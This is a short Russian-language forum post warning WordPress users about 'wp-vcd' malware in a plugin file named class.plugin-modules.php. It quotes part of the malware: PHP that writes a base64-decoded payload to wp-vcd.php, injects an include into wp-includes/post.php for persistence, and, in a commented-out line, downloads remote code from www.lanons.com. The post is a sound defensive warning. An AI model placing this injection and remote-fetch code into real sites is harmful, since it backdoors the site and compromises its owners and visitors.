Все намного проще, процедура лечения простая, я сам попадался на эту дрянь. вот пример файл который находился в плагине во время установки class.plugin-modules.php
Если внимательно посмотреть на весь код, то становиться понятно что нужно сделать, ОН просто вообще не нужен вот небольшой кусок из этого файла if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
{
if (strpos($file, 'wp-vcd') === false) {
$file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
file_put_contents($path . '/wp-includes/post.php', $file);
//@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('www.lanons.com/admin.txt'));
}
}
Именно один файл при установке стороннего плагина или шаблона создает всю конитель с вирусами, перед установкой стоит заглядывать в то, что устанавливаете